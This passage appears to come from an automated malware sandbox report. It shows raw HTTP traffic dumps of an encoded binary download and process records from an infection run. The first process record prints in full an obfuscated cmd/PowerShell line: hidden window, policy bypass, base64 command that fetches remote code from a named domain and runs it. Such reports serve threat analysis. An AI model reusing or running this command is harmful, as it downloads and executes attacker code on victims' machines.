                                                                                    Data Ascii: 6~3:6~6~;wn6~6C7~6~3:6~6~;n6~6C7~\6~3:6~6~;'n6~6C7~|6~3:6~6~;n6~6C7~6~3:6~6~;n6~6C7~<6~3:6~6~;n6~6C7~6~3:6~6~;n6~6C7~6~3:6~6~;n6~6C7~
                                                                                    2024-11-08 10:31:00 UTC1369INData Raw: 36 43 37 f5 7e bd e6 df 7c 89 1e 36 7e bb 33 35 3c 90 36 7e bd 36 7e bb 3b ef 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 1c 89 1e 36 7e bb 33 dd 3f 90 36 7e bd 36 7e bb 3b ff 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 3c 89 1e 36 7e bb 33 e5 3f 90 36 7e bd 36 7e bb 3b d7 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df dc 88 1e 36 7e bb 33 8d 3f 90 36 7e bd 36 7e bb 3b ef 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df fc 88 1e 36 7e bb 33 95 3f 90 36 7e bd 36 7e bb 3b f7 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 9c 88 1e 36 7e bb 33 95 3f 90 36 7e bd 36 7e bb 3b 9f 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df bc 88 1e 36 7e bb 33 a5 3f 90 36 7e bd 36 7e bb 3b a7 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 5c 88 1e 36 7e bb 33 bd 3f 90 36 7e bd 36 7e bb 3b a7 4b 6e 36 7e b5
                                                                                    Data Ascii: 6C7~|6~35<6~6~;Kn6~6C7~6~3?6~6~;Kn6~6C7~<6~3?6~6~;Kn6~6C7~6~3?6~6~;Kn6~6C7~6~3?6~6~;Kn6~6C7~6~3?6~6~;Kn6~6C7~6~3?6~6~;Kn6~6C7~\6~3?6~6~;Kn6~
                                                                                    2024-11-08 10:31:00 UTC753INData Raw: 47 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df dc 8f 1e 36 7e bb 33 55 31 90 36 7e bd 36 7e bb 3b 6f 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df fc 8f 1e 36 7e bb 33 6d 31 90 36 7e bd 36 7e bb 3b 77 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 9c 8f 1e 36 7e bb 33 75 31 90 36 7e bd 36 7e bb 3b 1f 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df bc 8f 1e 36 7e bb 33 1d 31 90 36 7e bd 36 7e bb 3b 27 4b 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 5c 8f 1e 36 7e bb 33 2d 31 90 36 7e bd 36 7e bb 3b cf 4a 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 7c 8f 1e 36 7e bb 33 35 31 90 36 7e bd 36 7e bb 3b d7 4a 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 1c 8f 1e 36 7e bb 33 dd 30 90 36 7e bd 36 7e bb 3b ff 4a 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 3c 8f 1e 36 7e bb 33 e5 30 90 36 7e bd 36 7e bb
                                                                                    Data Ascii: GKn6~6C7~6~3U16~6~;oKn6~6C7~6~3m16~6~;wKn6~6C7~6~3u16~6~;Kn6~6C7~6~316~6~;'Kn6~6C7~\6~3-16~6~;Jn6~6C7~|6~3516~6~;Jn6~6C7~6~306~6~;Jn6~6C7~<6~306~6~
                                                                                    2024-11-08 10:31:01 UTC1369INData Raw: 1e 36 7e bb 33 fd 33 90 36 7e bd 36 7e bb 3b 97 4d 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df dc 80 1e 36 7e bb 33 cd 33 90 36 7e bd 36 7e bb 3b bf 4d 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df fc 80 1e 36 7e bb 33 d5 33 90 36 7e bd 36 7e bb 3b 47 4d 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 9c 80 1e 36 7e bb 33 e5 33 90 36 7e bd 36 7e bb 3b 6f 4d 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df bc 80 1e 36 7e bb 33 ed 33 90 36 7e bd 36 7e bb 3b 77 4d 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 5c 80 1e 36 7e bb 33 f5 33 90 36 7e bd 36 7e bb 3b 07 4d 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 7c 80 1e 36 7e bb 33 f5 33 90 36 7e bd 36 7e bb 3b 07 4d 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 1c 80 1e 36 7e bb 33 8d 33 90 36 7e bd 36 7e bb 3b 1f 4d 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 3c
                                                                                    Data Ascii: 6~336~6~;Mn6~6C7~6~336~6~;Mn6~6C7~6~336~6~;GMn6~6C7~6~336~6~;oMn6~6C7~6~336~6~;wMn6~6C7~\6~336~6~;Mn6~6C7~|6~336~6~;Mn6~6C7~6~336~6~;Mn6~6C7~<
                                                                                    2024-11-08 10:31:01 UTC1369INData Raw: f5 7e bd e6 df 9c 87 1e 36 7e bb 33 95 32 90 36 7e bd 36 7e bb 3b 27 4e 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df bc 87 1e 36 7e bb 33 bd 32 90 36 7e bd 36 7e bb 3b cf 41 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 5c 87 1e 36 7e bb 33 45 32 90 36 7e bd 36 7e bb 3b d7 41 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 7c 87 1e 36 7e bb 33 6d 32 90 36 7e bd 36 7e bb 3b ff 41 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 1c 87 1e 36 7e bb 33 75 32 90 36 7e bd 36 7e bb 3b 87 41 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 3c 87 1e 36 7e bb 33 1d 32 90 36 7e bd 36 7e bb 3b af 41 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df dc 86 1e 36 7e bb 33 25 32 90 36 7e bd 36 7e bb 3b b7 41 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df fc 86 1e 36 7e bb 33 cd 35 90 36 7e bd 36 7e bb 3b 5f 41 6e 36 7e b5 0f 36 43
                                                                                    Data Ascii: ~6~326~6~;'Nn6~6C7~6~326~6~;An6~6C7~\6~3E26~6~;An6~6C7~|6~3m26~6~;An6~6C7~6~3u26~6~;An6~6C7~<6~326~6~;An6~6C7~6~3%26~6~;An6~6C7~6~356~6~;_An6~6C


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    18192.168.11.3049795104.21.86.219443
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:31:44 UTC76OUTGET /StaticFile/TermServiceTryRun/11 HTTP/1.1
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    2024-11-08 10:31:45 UTC1100INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:31:45 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 2183168
                                                                                    Connection: close
                                                                                    content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                    hash: BFF2365257251B6BA227A5E748DBD62E
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mZKAu4s48TeG1TLMlIW7MmclIckkIxulDIayxpHPibM7j2jiYOGr3rnAtll5EcI3u8%2BCIOd96qyRzeIzl%2B6iWDeYsW3Daan%2FfMDi14R3eLNAKlwgTJ6I3TqK0U4tFRtOzBMukmQhAH29"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=16074&sent=6774&recv=3455&lost=0&retrans=0&sent_bytes=9404948&recv_bytes=57765&delivery_rate=23294523&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e5285a510c78-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102117&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=714&delivery_rate=37462&cwnd=252&unsent_bytes=0&cid=dae48efe211e8a03&ts=893&x=0"
                                                                                    2024-11-08 10:31:45 UTC269INData Raw: 46 51 5b 0b 09 0b 0b 0b 0f 0b 04 0b f4 f4 0b 0b b3 0b 0b 0b 0b 0b 0b 0b 4b 0b 11 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0a 0b 0b b1 1b 0b 05 14 bf 02 c6 2a b3 0a 47 c6 2a 9b 9b 5f 63 62 78 2b 7b 79 64 6c 79 6a 66 2b 66 7e 78 7f 2b 69 6e 2b 79 7e 65 2b 7e 65 6f 6e 79 2b 5c 62 65 38 39 06 01 2f 3c 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b
                                                                                    Data Ascii: FQ[K*G*_cbx+{ydlyjf+f~x+in+y~e+~eony+\be89/<
                                                                                    2024-11-08 10:31:45 UTC1369INData Raw: 0b 0b 0b 0b 0b 0b 0b eb 0b 09 0a 00 0a 09 12 0b 07 05 0b 0b 4b 18 0b 0b 0b 0b 0b 77 06 05 0b 0b 1b 0b 0b 0b 3b 05 0b 0b 0b 4b 0b 0b 1b 0b 0b 0b 09 0b 0b 0d 0b 0b 0b 0b 0b 0b 0b 0d 0b 0b 0b 0b 0b 0b 0b 0b 3b 29 0b 0b 0f 0b 0b 0b 0b 0b 0b 08 0b 4b 8a 0b 0b 1b 0b 0b 4b 0b 0b 0b 0b 1b 0b 0b 1b 0b 0b 0b 0b 0b 0b 1b 0b 0b 0b 0b 1b 04 0b 7a 0b 0b 0b 0b eb 05 0b 0f 1a 0b 0b 0b 9b 1b 0b 0b 97 1a 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 4b 04 0b 07 40 0a 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 3b 04 0b 13 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 03 e8 05 0b 9b 09 0b 0b 0b 0b 04 0b 6d 09 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 25 7f 6e 73 7f 0b 0b 0b 2b ed 06 0b 0b 1b 0b 0b 0b e3 06 0b
                                                                                    Data Ascii: Kw;K;)KKzK@;m%ns+
                                                                                    2024-11-08 10:31:45 UTC1369INData Raw: 09 0b 0b 0b 8b f4 f4 f4 74 53 19 4b 0b 0e 4d 6a 67 78 6e 0f 5f 79 7e 6e 0d 58 72 78 7f 6e 66 09 0b 0b 87 19 4b 0b 08 03 47 64 65 6c 49 64 64 67 0f 0b 0b 0b 8b f4 f4 f4 74 83 19 4b 0b 0e 4d 6a 67 78 6e 0f 5f 79 7e 6e 0d 58 72 78 7f 6e 66 09 0b 0b b7 19 4b 0b 19 0d 78 7f 79 62 65 6c 09 0b 0b 0b c7 19 4b 0b 00 01 5c 62 6f 6e 58 7f 79 62 65 6c 09 0b 0b 0b eb 19 4b 0b 01 01 4a 65 78 62 58 7f 79 62 65 6c 0b 0b 09 0b ff 19 4b 0b 07 0c 5d 6a 79 62 6a 65 7f 09 0b 0b 0f 18 4b 0b 07 01 44 67 6e 5d 6a 79 62 6a 65 7f 09 0b 0b 0b 13 18 4b 0b 18 0d 5f 48 67 6a 78 78 97 14 4b 0b 09 0b 0b 0b 27 18 4b 0b 0a 0c 43 59 4e 58 5e 47 5f 0f 0b 0b 0b 8b f4 f4 f4 74 09 0b 4f 18 4b 0b 05 0e 5f 4c 5e 42 4f 1b 0b 0b 0b 0b 0b 0b 0b 0b 0f 0b 0b 0b ef 1b 4b 0b 0b 0b 0b 0b 09 09 4f 3a 09
                                                                                    Data Ascii: tSKMjgxn_y~nXrxnfKGdelIddgtKMjgxn_y~nXrxnfKxybelK\bonXybelKJexbXybelK]jybjeKDgn]jybjeK_HgjxxK'KCYNX^G_tOK_L^BOKO:
                                                                                    2024-11-08 10:31:45 UTC1369INData Raw: f4 1b 11 4b 0b 48 0b ff f4 30 11 4b 0b 48 0b ff f4 6f 11 4b 0b 48 0b ff f4 9b 11 4b 0b 48 0b ff f4 c7 11 4b 0b 48 0b ff f4 0c 10 4b 0b 48 0b ff f4 49 10 4b 0b 48 0b ff f4 83 10 4b 0b 48 0b ff f4 ce 10 4b 0b 49 0b ff f4 f4 10 4b 0b 49 0b ff f4 32 17 4b 0b 49 0b ff f4 74 17 4b 0b 48 0b ff f4 b6 17 4b 0b 48 0b ff f4 e5 17 4b 0b 48 0b ff f4 2a 16 4b 0b 48 0b ff f4 5e 16 4b 0b 41 0b fe f4 83 16 4b 0b 41 0b fd f4 b8 16 4b 0b 41 0b fc f4 ed 16 4b 0b 41 0b f3 f4 4a 15 4b 0b 41 0b f2 f4 79 15 4b 0b 41 0b f1 f4 a8 15 4b 0b 41 0b f0 f4 d7 15 4b 0b 41 0b f7 f4 10 14 4b 0b 40 0b f6 f4 4d 14 4b 0b 41 0b f5 f4 79 14 4b 0b 46 0b f4 f4 0b 0b 0c 5f 44 69 61 6e 68 7f 2d 0b db 85 4b 0b 0d 48 79 6e 6a 7f 6e 08 0b 0b 0b 0b 0b 03 0b 0a 03 97 14 4b 0b 0b 0b 0f 58 6e 67 6d 09 0b
                                                                                    Data Ascii: KH0KHoKHKHKHKHIKHKHKIKI2KItKHKHKH*KH^KAKAKAKAJKAyKAKAKAK@MKAyKF_Dianh-KHynjnKXngm
                                                                                    2024-11-08 10:31:45 UTC516INData Raw: 0b 0a 0b 0a 0a 09 0b 09 0b 3f 0b 33 9a 4b 0b 02 5e 65 62 7f 58 68 64 7b 6e 08 0b b3 19 4b 0b 03 0b 09 0b 0b 0b 0b 0b 0b 0b 0f 58 6e 67 6d 09 0b 4b b3 19 4b 0b 0a 0b 0a 0a 09 0b 09 0b 38 0b 17 9b 4b 0b 0d 4e 7a 7e 6a 67 78 08 0b 0b 1b 4b 0b 03 0b 09 03 97 14 4b 0b 0b 0b 0f 58 6e 67 6d 09 0b 03 97 14 4b 0b 0a 0b 08 44 69 61 09 0b 09 0b 20 0b 2f 9b 4b 0b 00 4c 6e 7f 43 6a 78 63 48 64 6f 6e 08 0b 97 1b 4b 0b 03 0b 0a 03 97 14 4b 0b 0b 0b 0f 58 6e 67 6d 09 0b 09 0b 38 0b 07 98 4b 0b 03 5f 64 58 7f 79 62 65 6c 08 0b b3 19 4b 0b 03 0b 09 03 97 14 4b 0b 0b 0b 0f 58 6e 67 6d 09 0b 4b b3 19 4b 0b 0a 0b 0a 0a 09 0b 09 0b 50 0b 0f 98 4b 0b 1a 58 6a 6d 6e 48 6a 67 67 4e 73 68 6e 7b 7f 62 64 65 08 0b 23 18 4b 0b 03 0b 08 03 97 14 4b 0b 0b 0b 0f 58 6e 67 6d 09 0b 03 97
                                                                                    Data Ascii: ?3K^ebXhd{nKXngmKK8KNz~jgxKKXngmKDia /KLnCjxcHdonKKXngm8K_dXybelKKXngmKKPKXjmnHjggNshn{bde#KKXngm
                                                                                    2024-11-08 10:31:45 UTC1369INData Raw: 0b e7 86 4b 0b 00 45 6e 7c 42 65 78 7f 6a 65 68 6e 08 0b 97 14 4b 0b 03 0b 0a 0b 0b 0b 0b 0b 0b 0b 0f 58 6e 67 6d 09 0b 09 0b 27 0b 0f 85 4b 0b 07 4d 79 6e 6e 42 65 78 7f 6a 65 68 6e 08 0b 0b 0b 0b 0b 03 0b 0a 03 97 14 4b 0b 0b 0b 0f 58 6e 67 6d 09 0b 09 0b 2c 0b fb 85 4b 0b 0c 4f 6e 78 7f 79 64 72 08 0b 0b 0b 0b 0b 03 0b 0a 03 97 14 4b 0b 0b 0b 0f 58 6e 67 6d 09 0b 09 0b 0b 0b 0b ab 14 4b 0b 0c 0c 5f 44 69 61 6e 68 7f 77 1c 4b 0b 0b 0b 0b 0b 0b 0b 0d 58 72 78 7f 6e 66 0b 0b 0b 0b 09 0b 0b 0b 0b 0b 17 2b 4b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 33 2b 4b 0b 0b 0b 0b 0b 17 2b 4b 0b 0b 0b 0b 0b 29 2b 4b 0b 03 0b 0b 0b 2f 1c 4b 0b 17 9b 4b 0b 2f 9b 4b 0b 07 98 4b 0b 0f 98 4b 0b 2f 98 4b 0b 23 98 4b 0b 27 98 4b 0b 2b 98 4b 0b e7 86 4b 0b 0f 85 4b 0b fb 85 4b
                                                                                    Data Ascii: KEn|BexjehnKXngm'KMynnBexjehnKXngm,KOnxydrKXngmK_DianhwKXrxnf+K3+K+K)+K/KK/KKK/K#K'K+KKKK
                                                                                    2024-11-08 10:31:45 UTC1369INData Raw: 0b 03 3f 9d 4b 0b 0f 4e 73 62 7f 0b 0b 0b 0b 0b 0b 0b 09 0b 0b 0b 0b 9b 2f 4b 0b 05 03 5f 46 64 65 62 7f 64 79 17 0b 0b 0b 0b 0b 0b 0b 0b 0c 0b 0b 0b 97 1b 4b 0b 0b 0b 0b 0b 0b 01 4d 47 64 68 60 48 64 7e 65 7f 07 0b 3b 29 4b 0b db 85 4b 0b 0b 0b 97 1b 4b 0b 0f 0b 0b 0b 0b 04 4d 59 6e 68 7e 79 78 62 64 65 48 64 7e 65 7f 09 0b ef 1b 4b 0b 03 0b 0b 0b 0b 06 4d 44 7c 65 62 65 6c 5f 63 79 6e 6a 6f 09 0b 0b 1a 4b 0b 07 0b 0b 0b 0b 01 4d 47 64 68 60 4e 7d 6e 65 7f 09 0b 97 1b 4b 0b 1b 0b 0b 0b 0b 01 4d 58 7b 62 65 48 64 7e 65 7f 09 0b 97 28 4b 0b 1f 0b 0b 0b 0b 01 4d 5c 6a 62 7f 5a 7e 6e 7e 6e 09 0b 23 2f 4b 0b 13 0b 0b 0b 0b 01 4d 5a 7e 6e 7e 6e 47 64 68 60 09 0b 09 0b 02 0b 02 6b 96 4b 0b 07 58 6e 7f 58 7b 62 65 48 64 7e 65 7f 0b 0b 0b 0b 0b 0b 09 01 97 14 4b
                                                                                    Data Ascii: ?KNsb/K_FdebdyKMGdh`Hd~e;)KKKMYnh~yxbdeHd~eKMD|ebel_cynjoKMGdh`N}neKMX{beHd~e(KM\jbZ~n~n#/KMZ~n~nGdh`kKXnX{beHd~eK
                                                                                    2024-11-08 10:31:45 UTC1369INData Raw: 4b 0b 0b 0b 0b 0b 1f 21 4b 0b 0b 0b 0b 0b 11 21 4b 0b 07 0b 0b 0b 2f 1c 4b 0b 17 9b 4b 0b 2f 9b 4b 0b 07 98 4b 0b 0f 98 4b 0b 2f 98 4b 0b 23 98 4b 0b 27 98 4b 0b 2b 98 4b 0b e7 86 4b 0b 0f 85 4b 0b fb 85 4b 0b 0b 0b 0b 0b 0b 0b 1a 5f 45 64 59 6e 6d 48 64 7e 65 7f 44 69 61 6e 68 7f 3b 21 4b 0b 0c 1a 5f 45 64 59 6e 6d 48 64 7e 65 7f 44 69 61 6e 68 7f 1f 21 4b 0b 97 14 4b 0b 0b 0b 0d 58 72 78 7f 6e 66 0b 0b 0b 0b 09 0b 0b 0b 6b 21 4b 0b 1f 07 5b 58 63 64 79 7f 58 7f 79 62 65 6c ef 1a 4b 0b 09 0b 73 21 4b 0b 01 01 5e 5f 4d 33 58 7f 79 62 65 6c e2 f6 09 0b 87 21 4b 0b 01 06 59 6a 7c 49 72 7f 6e 58 7f 79 62 65 6c f4 f4 09 0b 0b af 21 4b 0b 1f 0e 5b 49 72 7f 6e bf 1b 4b 0b 09 0b 0b 0b 0b b3 21 4b 0b 1f 0d 5b 42 65 7f 3d 3f 1f 1a 4b 0b 09 0b 0b 0b c7 21 4b 0b 1f
                                                                                    Data Ascii: K!K!K/KK/KKK/K#K'K+KKKK_EdYnmHd~eDianh;!K_EdYnmHd~eDianh!KKXrxnfk!K[XcdyXybelKs!K^_M3Xybel!KYj|IrnXybel!K[IrnK!K[Be=?K!K
                                                                                    2024-11-08 10:31:45 UTC1369INData Raw: 0b 0b 0b 09 0d 5d 49 72 7f 6e 78 09 0b 0b 0b 0b 0b 0b 0b 0b 0b 09 0c 59 6a 7c 4f 6a 7f 6a 09 0b 09 0b 0b 0b 0b 5b 24 4b 0b 08 02 5f 5f 72 7b 6e 40 62 65 6f 0a 0b 0b 0b 0b 1d 0b 0b 0b 47 24 4b 0b 02 7f 60 5e 65 60 65 64 7c 65 02 7f 60 42 65 7f 6e 6c 6e 79 0d 7f 60 48 63 6a 79 06 7f 60 4e 65 7e 66 6e 79 6a 7f 62 64 65 0c 7f 60 4d 67 64 6a 7f 03 7f 60 58 7f 79 62 65 6c 0e 7f 60 58 6e 7f 0c 7f 60 48 67 6a 78 78 03 7f 60 46 6e 7f 63 64 6f 0c 7f 60 5c 48 63 6a 79 02 7f 60 47 58 7f 79 62 65 6c 02 7f 60 5c 58 7f 79 62 65 6c 02 7f 60 5d 6a 79 62 6a 65 7f 0c 7f 60 4a 79 79 6a 72 03 7f 60 59 6e 68 64 79 6f 00 7f 60 42 65 7f 6e 79 6d 6a 68 6e 0c 7f 60 42 65 7f 3d 3f 01 7f 60 4f 72 65 4a 79 79 6a 72 02 7f 60 5e 58 7f 79 62 65 6c 01 7f 60 48 67 6a 78 78 59 6e 6d 02 7f
                                                                                    Data Ascii: ]IrnxYj|Ojj[$K__r{n@beoG$K`^e`ed|e`Benlny`Hcjy`Ne~fnyjbde`Mgdj`Xybel`Xn`Hgjxx`Fncdo`\Hcjy`GXybel`\Xybel`]jybje`Jyyjr`Ynhdyo`Benymjhn`Be=?`OreJyyjr`^Xybel`HgjxxYnm
                                                                                    2024-11-08 10:31:45 UTC1369INData Raw: a2 34 4b 0b 48 0b ff f4 f7 34 4b 0b 48 0b ff f4 46 4b 4b 0b 48 0b ff f4 99 4b 4b 0b 48 0b ff f4 d3 4b 4b 0b 48 0b ff f4 15 4a 4b 0b 48 0b ff f4 6f 4a 4b 0b 48 0b ff f4 a3 4a 4b 0b 48 0b ff f4 fd 4a 4b 0b 48 0b ff f4 27 49 4b 0b 48 0b ff f4 6f 49 4b 0b 48 0b ff f4 ab 49 4b 0b 48 0b ff f4 d0 49 4b 0b 48 0b ff f4 12 48 4b 0b 48 0b ff f4 62 48 4b 0b 48 0b ff f4 a1 48 4b 0b 48 0b ff f4 ed 48 4b 0b 48 0b ff f4 3f 4f 4b 0b 48 0b ff f4 79 4f 4b 0b 48 0b ff f4 a5 4f 4b 0b 48 0b ff f4 08 4e 4b 0b 48 0b ff f4 61 4e 4b 0b 48 0b ff f4 c9 4e 4b 0b 48 0b ff f4 1c 4d 4b 0b 48 0b ff f4 8e 4d 4b 0b 48 0b ff f4 ef 4d 4b 0b 48 0b ff f4 4b 4c 4b 0b 48 0b ff f4 ad 4c 4b 0b 48 0b ff f4 15 43 4b 0b 48 0b ff f4 9a 43 4b 0b 48 0b ff f4 1d 42 4b 0b 48 0b ff f4 74 42 4b 0b 48 0b ff
                                                                                    Data Ascii: 4KH4KHFKKHKKHKKHJKHoJKHJKHJKH'IKHoIKHIKHIKHHKHbHKHHKHHKH?OKHyOKHOKHNKHaNKHNKHMKHMKHMKHKLKHLKHCKHCKHBKHtBKH


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:05:29:26
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit
                                                                                    Imagebase:0x7ff74ca60000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:05:29:26
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:05:29:26
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"
                                                                                    Imagebase:0x7ff7a5ba0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:05:29:26
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:05:29:28
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline"
                                                                                    Imagebase:0x7ff6f7770000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

